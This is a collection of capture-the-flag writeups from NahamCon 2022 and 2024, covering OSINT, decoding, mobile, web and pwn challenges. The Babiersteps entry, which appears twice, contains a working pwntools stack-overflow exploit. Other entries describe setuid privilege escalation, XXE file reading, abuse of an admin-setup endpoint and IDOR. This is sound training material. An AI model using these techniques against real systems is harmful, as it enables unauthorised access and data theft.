--------------------------------------------------------------------------------
/nahamcon_2022/keeber_security/Keeber3.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Keeber 3 Writeup
4 | desc: Check out our writeup for Keeber 3 for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: keeber_security
9 | challenge: Keeber 3
10 | tags: "osint, starry, web"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-Lord
17 |
18 | 
19 |
20 | Here is their github:
21 |
22 | https://github.com/keebersecuritygroup
23 |
24 | https://github.com/keebersecuritygroup/security-evaluation-workflow/commit/e76da63337cfabb12ea127af3f86168e9dd08428
25 |
26 |
27 | We can see that at this point in time a file called asana_secret.txt was uploaded to the GitHub repository by mistake: Tiffany made a typo in the .gitignore file, so it kept asana_secret.tx (which doesn’t exist) from being committed instead of asana_secret.txt. A secret that has been committed stays readable in the commit history, so it has to be revoked and not just deleted.
28 | Looking up Asana, I read that we can query other users’ e-mails if we invite them to a group we create. It didn’t help us here, but it is still a detail worth noting.
29 | Researching more on asana, I discovered it has an API which allows to get information back with the right Authorization Header.
30 |
31 | 
32 |
33 |
--------------------------------------------------------------------------------
/nahamcon_2022/keeber_security/Keeber5.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Keeber 5 Writeup
4 | desc: Check out our writeup for Keeber 5 for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: keeber_security
9 | challenge: Keeber 5
10 | tags: "osint, starry"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-Lord
17 |
18 | 
19 |
20 | Clone the repository /security-evaluation-workflow/ and check commit logs.
21 |
22 | 
23 |
24 | ```
25 | email: tif.hearts.science@gmail.com
26 | ```
27 |
28 |
--------------------------------------------------------------------------------
/nahamcon_2022/keeber_security/Keeber6.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Keeber 6 Writeup
4 | desc: Check out our writeup for Keeber 6 for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: keeber_security
9 | challenge: Keeber 6
10 | tags: "osint, starry"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-Lord
17 |
18 | 
19 |
20 | Lost a piece of my soul and made a yelp account, to look for reviews by e-mail.
21 |
22 | 
23 |
24 |
--------------------------------------------------------------------------------
/nahamcon_2022/keeber_security/Keeber7.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Keeber 7 Writeup
4 | desc: Check out our writeup for Keeber 7 for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: keeber_security
9 | challenge: Keeber 7
10 | tags: "osint, starry"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved too late by: Starry-Lord
17 |
18 | 
19 |
20 | 
21 |
22 | ```
23 | e-mail: cheerios.fanatic1941@gmail.com
24 | ```
25 |
26 | https://seon.io/resources/the-ultimate-guide-to-free-email-lookup-and-reverse-email-lookup-tools/
27 |
28 |
29 | This online tool showed a mention about myspace, so I sacrificed another bit of my soul and made a MySpace account. This allows us to find the flag and a new username:
30 |
31 |
32 | 
33 |
34 |
--------------------------------------------------------------------------------
/nahamcon_2022/keeber_security/Keeber8.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Keeber 8 Writeup
4 | desc: Check out our writeup for Keeber 8 for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: keeber_security
9 | challenge: Keeber 8
10 | tags: "osint, starry"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved too late by: Starry-Lord
17 |
18 | 
19 |
20 | ```
21 | myspace username: cereal_lover1990
22 | ```
23 |
24 | A quick search for the username with another [online tool](https://instantusername.com) reveals a matching user on pastebin.com:
25 |
26 |
27 | ```
28 | https://pastebin.com/u/cereal_lover1990
29 | ```
30 |
31 | 
32 |
33 | content of Chump List:
34 |
35 | 
--------------------------------------------------------------------------------
/nahamcon_2022/misc/Gossip.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Gossip Writeup
4 | desc: Check out our writeup for Gossip for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: misc
9 | challenge: Gossip
10 | tags: "misc, starry, taz, legend, twh, cve, lpe, privesc"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Starry-Lord, Taz, Legend, thewhiteh4t
17 |
18 | This one involved an ssh connection to a Linux machine. We could find kubernetes secrets in the usual /run/secrets/kubernetes.io/serviceaccount which revealed it was a kubernetes container.
19 | After a bit of enumeration I learned about CVE-2022-0185 which allows us to escape the container, but it looked like it had been patched.
20 |
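21 | Further enumeration led me to find the setuid/setgid bits set on some of the binaries in /usr/bin (the `s` flags in the listing below; these are not the sticky bit). I looked them up to find a fitting one called dialog, which is owned by root and will therefore allow us to read files with elevated permissions: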
22 |
23 | ```
24 | user@gossip-9d9e950dfdcbda12-64cdd78676-psbqk:/usr/bin$ ls -la dialog
25 | -rwsr-sr-x 1 root root 260736 Jan 3 23:30 dialog
26 | ```
27 |
28 | 
29 |
30 | After a bit of cleaning up, we can use this key to log in as root.
31 |
32 |
33 | 
34 |
35 |
--------------------------------------------------------------------------------
/nahamcon_2022/misc/SteamLocomotive.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Steam Locomotive Writeup
4 | desc: Check out our writeup for Steam Locomotive for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: misc
9 | challenge: Steam Locomotive
10 | tags: "misc, legend"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Legend
17 |
18 | In this challenge we were given ssh credentials to get the flag, with a hint that the `ls` command was accidentally being mistyped.
19 |
20 | When I connected over ssh, the session played a steam engine animation (the `sl` command, which stands for Steam Locomotive), and as soon as the animation was over the session was disconnected.
21 |
22 | 
23 |
24 | To retrieve the flag we needed to read the flag file, and since ssh allows a command to be given directly when connecting, we can read the flag that way.
25 |
26 | 
--------------------------------------------------------------------------------
/nahamcon_2022/misc/Tobeandnottobe.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | To be and not to be Writeup
4 | desc: Check out our writeup for To be and not to be for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: misc
9 | challenge: To be and not to be
10 | tags: "misc, twh"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : thewhiteh4t
17 |
18 | This challenge accepts only alphabetic characters, and the input length is 3.
19 |
20 | Found the solution here :
21 |
22 | ```
23 | https://github.com/freeCodeCamp/freeCodeCamp/issues/11763
24 | ```
25 |
26 | 
27 |
28 |
--------------------------------------------------------------------------------
/nahamcon_2022/mobile.md:
--------------------------------------------------------------------------------
1 | # mobile
2 |
3 | ## Mobilize
4 | > Solved by: Legend
5 |
6 | In this challenge an Android APK was given.
7 |
8 | Initially I installed the APK on an Android virtual device to check what the app is about and to see what it does. But there was nothing informative.
9 |
10 | 
11 |
12 | Then with the help of apktool I decompiled the APK to see how the app works and also to look for the flag string. There were lots of sub-directories, so I just used grep to see if the flag might be present in plain text, and got the flag.
13 |
14 | 
--------------------------------------------------------------------------------
/nahamcon_2022/mobile/Mobilize.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Mobilize Writeup
4 | desc: Check out our writeup for Mobilize for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: mobile
9 | challenge: Mobilize
10 | tags: "mobile, legend, android"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Legend
17 |
18 | In this challenge an Android APK was given.
19 |
20 | Initially I installed the APK on an Android virtual device to check what the app is about and to see what it does. But there was nothing informative.
21 |
22 | 
23 |
24 | Then with the help of apktool I decompiled the APK to see how the app works and also to look for the flag string. There were lots of sub-directories, so I just used grep to see if the flag might be present in plain text, and got the flag.
25 |
26 | 
--------------------------------------------------------------------------------
/nahamcon_2022/pwn.md:
--------------------------------------------------------------------------------
1 | # pwn
2 |
3 | ## Babiersteps
4 | > Solved By : thewhiteh4t
5 |
6 | ```python
7 | #!/usr/bin/env python3
8 |
9 | from pwn import *
10 | # Script for the Babiersteps challenge: sends filler bytes followed by a packed address to the remote service.
11 | host = 'challenge.nahamcon.com'  # remote challenge service
12 | port = 32628
13 | # NOTE(review): the writeup does not show how 120 was derived; presumably it is the distance from the start of the input buffer to the saved return address -- confirm against the binary.
14 | offset = 120
15 | junk = b'A' * offset  # filler bytes placed in front of the address
16 | win_addr = 0x4011c9  # presumably the address of the function that prints the flag; a fixed address only holds if the binary is not position-independent -- TODO confirm
17 | # p64 packs the address as 8 bytes, little-endian here. Stack protection (canaries) would normally catch such an overwrite; presumably it is disabled in this challenge binary.
18 | le_win_addr = p64(win_addr, endianness='little')
19 | payload = junk + le_win_addr
20 | # Connect, read up to 1024 bytes of whatever the service sends first, then send the payload as one line.
21 | conn = remote(host, port)
22 | conn.recv(1024)
23 | conn.sendline(payload)
24 | conn.interactive()  # hand the connection over to the terminal so the response can be read
25 | conn.close()
26 | ```
27 |
28 | 
--------------------------------------------------------------------------------
/nahamcon_2022/pwn/Babiersteps.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Babiersteps Writeup
4 | desc: Check out our writeup for Babiersteps for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: pwn
9 | challenge: Babiersteps
10 | tags: "pwn, twh, python"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : thewhiteh4t
17 |
18 | ```python
19 | #!/usr/bin/env python3
20 |
21 | from pwn import *
22 | # Script for the Babiersteps challenge: sends filler bytes followed by a packed address to the remote service.
23 | host = 'challenge.nahamcon.com'  # remote challenge service
24 | port = 32628
25 | # NOTE(review): the writeup does not show how 120 was derived; presumably it is the distance from the start of the input buffer to the saved return address -- confirm against the binary.
26 | offset = 120
27 | junk = b'A' * offset  # filler bytes placed in front of the address
28 | win_addr = 0x4011c9  # presumably the address of the function that prints the flag; a fixed address only holds if the binary is not position-independent -- TODO confirm
29 | # p64 packs the address as 8 bytes, little-endian here. Stack protection (canaries) would normally catch such an overwrite; presumably it is disabled in this challenge binary.
30 | le_win_addr = p64(win_addr, endianness='little')
31 | payload = junk + le_win_addr
32 | # Connect, read up to 1024 bytes of whatever the service sends first, then send the payload as one line.
33 | conn = remote(host, port)
34 | conn.recv(1024)
35 | conn.sendline(payload)
36 | conn.interactive()  # hand the connection over to the terminal so the response can be read
37 | conn.close()
38 | ```
39 |
40 | 
--------------------------------------------------------------------------------
/nahamcon_2022/warmups/crashoverride.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | crash override Writeup
4 | desc: Check out our writeup for crash override for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: warmups
9 | challenge: crash override
10 | tags: "warmup, twh"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > solved by : thewhiteh4t
17 |
18 | Basic buffer overflow challenge. In the C code we can see that the buffer size is 2048, so I just sent 2060 “A” characters and got the flag.
19 |
20 | 
21 |
22 |
--------------------------------------------------------------------------------
/nahamcon_2022/warmups/exitvim.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | exit vim Writeup
4 | desc: Check out our writeup for exit vim for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: warmups
9 | challenge: exit vim
10 | tags: "warmup, starry"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Starry-Lord
17 |
18 | 
19 |
20 | ctrl+c, colon (type `:`), `q`, enter
21 |
22 | 
23 |
24 |
--------------------------------------------------------------------------------
/nahamcon_2022/warmups/flagcat.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | flagcat Writeup
4 | desc: Check out our writeup for flagcat for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: warmups
9 | challenge: flagcat
10 | tags: "warmup, starry"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Starry-Lord
17 |
18 | 
19 |
20 |
--------------------------------------------------------------------------------
/nahamcon_2022/warmups/prisoner.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | prisoner Writeup
4 | desc: Check out our writeup for prisoner for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: warmups
9 | challenge: prisoner
10 | tags: "warmup, starry"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Starry-Lord
17 |
18 | Press ctrl+d to escape the Python-like shell.
19 |
20 | 
21 |
22 |
--------------------------------------------------------------------------------
/nahamcon_2022/warmups/wizard.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | wizard Writeup
4 | desc: Check out our writeup for wizard for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: warmups
9 | challenge: wizard
10 | tags: "warmup, starry"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Starry-Lord
17 |
18 | 
19 |
20 | 
21 |
22 | Used CyberChef and python to decode the strings
23 |
24 |
--------------------------------------------------------------------------------
/nahamcon_2022/web/EXtravagant.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | EXtravagant Writeup
4 | desc: Check out our writeup for EXtravagant for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: web
9 | challenge: EXtravagant
10 | tags: "web, nigamelastic, xxe"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved By : nigamelastic
18 | 
19 |
20 | The challenge mentions the following:
21 |
22 | ```
23 | The flag is in /var/www
24 | ```
25 |
26 | On accessing the website we see a normal interface offering XML parsing as a service.
27 |
28 | 
29 |
30 | From the mention of XML, it seems that this might be an XXE (XML external entity) vulnerability.
31 |
32 | Since we already know the location of the flag I used the following payload:
33 |
34 | 
35 |
36 | I simply uploaded it to the trial tab:
37 |
38 | 
39 |
40 | 
41 |
42 | and then used view XML tab to view my xml
43 |
44 | 
45 |
46 | This gives the flag.
47 |
48 | 
49 |
50 |
--------------------------------------------------------------------------------
/nahamcon_2022/web/JurrassicPark.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Jurrassic Park Writeup
4 | desc: Check out our writeup for Jurrassic Park for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: web
9 | challenge: Jurrassic Park
10 | tags: "web, starry"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Starry-Lord
17 |
18 | This easy challenge made me (finally) realise John Hammond has the same name as the Owner of the Jurrassic Park in the first movies.
19 |
20 | Pretty cool site by the way:
21 |
22 | 
23 |
24 | 
25 |
26 | content of /robots.txt
27 |
28 | ```
29 | User-agent: *
30 | Disallow: /ingen/
31 | ```
32 |
33 | The flag was here http://challenge.nahamcon.com/ingen/flag.txt
34 |
35 |
--------------------------------------------------------------------------------
/nahamcon_2024/README.md:
--------------------------------------------------------------------------------
1 | # NahamCon CTF 2024
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [Cryptography](crypto.md)
8 | * [Forensics](forensics.md)
9 | * [Misc](misc.md)
10 | * [Mobile](mobile.md)
11 | * [Rev](re.md)
12 | * [Scripting](scripting.md)
13 | * [Warmups](warmups.md)
14 | * [Web](web.md)
--------------------------------------------------------------------------------
/nahamcon_2024/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | Nahamcon 2024
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2024
7 | ---
--------------------------------------------------------------------------------
/nahamcon_2024/scripting/Base3200.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2024 | Base3200 Writeup
4 | desc: Check out our writeup for Base3200 for Nahamcon 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2024
7 | parent: nahamcon_2024
8 | category: scripting
9 | challenge: Base3200
10 | tags: "scripting, legend, python"
11 | date: 2024-05-28T00:00:00+00:00
12 | last_modified_at: 2024-05-28T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Legend
17 |
18 |
19 | - We are given a file, `theflag.xz`; `.xz` is a format used for high compression.
20 |
21 |
22 | - The compressed file contains a file named `theflag` which contains a very long encoded string.
23 |
24 |
25 | - At first I thought it was just `base64` with very long string but it was not getting decoded.
26 |
27 |
28 | - I googled and found past CTF on this.
29 | - http://dann.com.br/3dsctf-2016-misc100-base3200/ → Script didn’t work
30 | - https://ctf-writeup.blogspot.com/2016/12/3ds-ctf.html → Script worked
31 |
32 |
33 | - Basically, `3200` divided by `64` is `50`, so the data has been base64-encoded `50` times and has to be decoded `50` times.
34 |
35 | ```python
36 | import base64
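37 | # Undo the 50 nested base64 layers of the challenge file and print the result.
38 | with open('theflag.txt', 'r') as file:  # NOTE(review): the writeup calls the extracted file `theflag`; adjust the name if it was not renamed
39 |     file_data = file.read()  # the context manager closes the handle once the text is read
40 |
41 | for _ in range(50):
42 |     file_data = base64.b64decode(file_data)  # str on the first pass, bytes afterwards
43 |
44 | flag = file_data.decode('utf-8')
45 | print(f'Flag: {flag}')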
46 | ```
47 |
48 | ```
49 | Flag: flag{340ff1bee05244546c91dea53fba7642}
50 | ```
51 |
52 |
--------------------------------------------------------------------------------
/nahamcon_2024/warmup/QRRRRRRRR.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2024 | QRRRRRRRR Writeup
4 | desc: Check out our writeup for QRRRRRRRR for Nahamcon 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2024
7 | parent: nahamcon_2024
8 | category: warmup
9 | challenge: QRRRRRRRR
10 | tags: "warmup, twh"
11 | date: 2024-05-28T00:00:00+00:00
12 | last_modified_at: 2024-05-28T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : thewhiteh4t
17 |
18 |
19 | - A long QR code
20 | - this is called rMQR code
21 | - https://www.qrcode.com/en/codes/rmqr.html
22 | - this can be read using `scandit` app available on android playstore
23 |
24 | ```
25 | flag{a44557e380e3baae9c21c738664c6142}
26 | ```
27 |
28 |
--------------------------------------------------------------------------------
/nahamcon_2024/warmup/Readtherules.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2024 | Read the rules Writeup
4 | desc: Check out our writeup for Read the rules for Nahamcon 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2024
7 | parent: nahamcon_2024
8 | category: warmup
9 | challenge: Read the rules
10 | tags: "warmup, twh"
11 | date: 2024-05-28T00:00:00+00:00
12 | last_modified_at: 2024-05-28T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 |
20 | - flag is present in HTML comment
21 |
22 |
23 | 
24 |
25 |
26 | ```
27 | flag{90bc54705794a62015369fd8e86e557b}
28 | ```
29 |
30 |
--------------------------------------------------------------------------------
/nahamcon_2024/warmup/Thatsnotmybase.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2024 | That’s not my base Writeup
4 | desc: Check out our writeup for That’s not my base for Nahamcon 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2024
7 | parent: nahamcon_2024
8 | category: warmup
9 | challenge: That’s not my base
10 | tags: "warmup, twh"
11 | date: 2024-05-28T00:00:00+00:00
12 | last_modified_at: 2024-05-28T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 |
20 | - encoded string :
21 |
22 | ```
23 | F#S Solved by : thewhiteh4t
19 |
20 | - An image is provided
21 | - flag is in the strings of the image
22 |
23 |
24 | 
25 |
26 |
27 | ```
28 | flag{4ac54e3ba5f8f09049f3ad62403abb25}
29 | ```
30 |
31 |
--------------------------------------------------------------------------------
/nahamcon_2024/warmup/Uriel.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2024 | Uriel Writeup
4 | desc: Check out our writeup for Uriel for Nahamcon 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2024
7 | parent: nahamcon_2024
8 | category: warmup
9 | challenge: Uriel
10 | tags: "warmup, twh"
11 | date: 2024-05-28T00:00:00+00:00
12 | last_modified_at: 2024-05-28T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by: Legend
18 |
19 |
20 | - We are given an encoded string, with a hint that it is encoded twice.
21 |
22 | ```
23 | %25%36%36%25%36%63%25%36%31%25%36%37%25%37%62%25%33%38%25%36%35%25%36%36%25%36%35%25%36%32%25%33%36%25%33%36%25%36%31%25%33%37%25%33%31%25%33%39%25%36%32%25%33%37%25%33%35%25%36%31%25%33%34%25%36%32%25%33%37%25%36%33%25%33%36%25%33%33%25%33%34%25%36%34%25%33%38%25%33%38%25%33%35%25%33%37%25%33%38%25%33%38%25%36%34%25%36%36%25%36%33%25%37%64
24 | ```
25 |
26 | - This is a URL-encoded (percent-encoded) string, which gives the flag after decoding it twice.
27 |
28 | ```
29 | flag{8efeb66a719b75a4b7c634d885788dfc}
30 | ```
31 |
--------------------------------------------------------------------------------
/nahamcon_2024/warmup/copypasta.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2024 | copypasta Writeup
4 | desc: Check out our writeup for copypasta for Nahamcon 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2024
7 | parent: nahamcon_2024
8 | category: warmup
9 | challenge: copypasta
10 | tags: "warmup, twh"
11 | date: 2024-05-28T00:00:00+00:00
12 | last_modified_at: 2024-05-28T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 |
20 | - The flag is hidden in the text printed by the challenge
21 | - simply copy paste the text in the terminal and we get the flag
22 |
23 |
24 | 
25 |
26 |
27 | ```
28 | flag{1f68e019b29650f6e8ea15a7808f76fd}
29 | ```
30 |
31 |
--------------------------------------------------------------------------------
/nahamcon_2024/warmup/eicar.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2024 | eicar Writeup
4 | desc: Check out our writeup for eicar for Nahamcon 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2024
7 | parent: nahamcon_2024
8 | category: warmup
9 | challenge: eicar
10 | tags: "warmup, twh"
11 | date: 2024-05-28T00:00:00+00:00
12 | last_modified_at: 2024-05-28T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 | ```
20 | > md5sum eicar
21 | 44d88612fea8a8f36de82e1278abb02f eicar
22 | ```
23 |
24 | ```
25 | flag{44d88612fea8a8f36de82e1278abb02f}
26 | ```
27 |
28 |
--------------------------------------------------------------------------------
/nahamcon_2024/web/AllAboutRobots.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2024 | All About Robots Writeup
4 | desc: Check out our writeup for All About Robots for Nahamcon 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2024
7 | parent: nahamcon_2024
8 | category: web
9 | challenge: All About Robots
10 | tags: "web, legend"
11 | date: 2024-05-28T00:00:00+00:00
12 | last_modified_at: 2024-05-28T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by: Legend
18 |
19 |
20 | - The challenge name makes it clear that we need to check the `robots.txt` file. Even the homepage contained images showing `robots`.
21 | 
22 |
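23 | - So the first thing I did was visit the file, which listed one `Disallow` path. `robots.txt` is publicly readable, so a `Disallow` entry only asks crawlers to stay away; it does not restrict access to the path.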
24 | 
25 |
26 | - After visiting `/open_the_pod_bay_doors_hal_and_give_me_the_flag.html`, I got the flag.
27 | 
28 |
29 | ```
30 | flag{3f19b983c1de42bd49af1a237d7e57b9}
31 | ```
32 |
33 |
--------------------------------------------------------------------------------
/nahamcon_2024/web/HelpfulDesk.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2024 | Helpful Desk Writeup
4 | desc: Check out our writeup for Helpful Desk for Nahamcon 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2024
7 | parent: nahamcon_2024
8 | category: web
9 | challenge: Helpful Desk
10 | tags: "web, twh, dotnet, ilspy"
11 | date: 2024-05-28T00:00:00+00:00
12 | last_modified_at: 2024-05-28T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : thewhiteh4t
17 |
18 |
19 | - In this challenge security bulletin shows 3 versions of the application
20 | - v1.2 shows critical status
21 | - After downloading both updates we can use `diff` to check which files were updated
22 |
23 | ```
24 | diff -bur v1_1 v1_2
25 | ```
26 |
27 | 
28 |
29 | - Using Avalonia ILSpy we can decompile the DLL file and inspect different functions
30 | - `SetupController` contains some interesting code and it shows a URL path
31 |
32 |
33 | 
34 |
35 | - On visiting this page we can actually set admin credentials!
36 |
37 |
38 | 
39 |
40 | - After setting credentials we can login and inspect services to get the flag
41 |
42 |
43 | 
44 |
45 |
--------------------------------------------------------------------------------
/nahamcon_2024/web/iDoor.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2024 | iDoor Writeup
4 | desc: Check out our writeup for iDoor for Nahamcon 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2024
7 | parent: nahamcon_2024
8 | category: web
9 | challenge: iDoor
10 | tags: "web, legend, idor"
11 | date: 2024-05-28T00:00:00+00:00
12 | last_modified_at: 2024-05-28T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by: Legend
18 |
19 |
20 | - This one is also very clear from the name: we need to find the IDOR (insecure direct object reference). The challenge description also hints that they are using the `SHA256` algorithm to create the object references.
21 |
22 |
23 | 
24 |
25 | - We are a customer with `ID: 11` and reference id is `4fc82b26aecb47d2868c4efbe3581732a3e7cbcc6c2efb32062c08170a05eeb8`
26 |
27 |
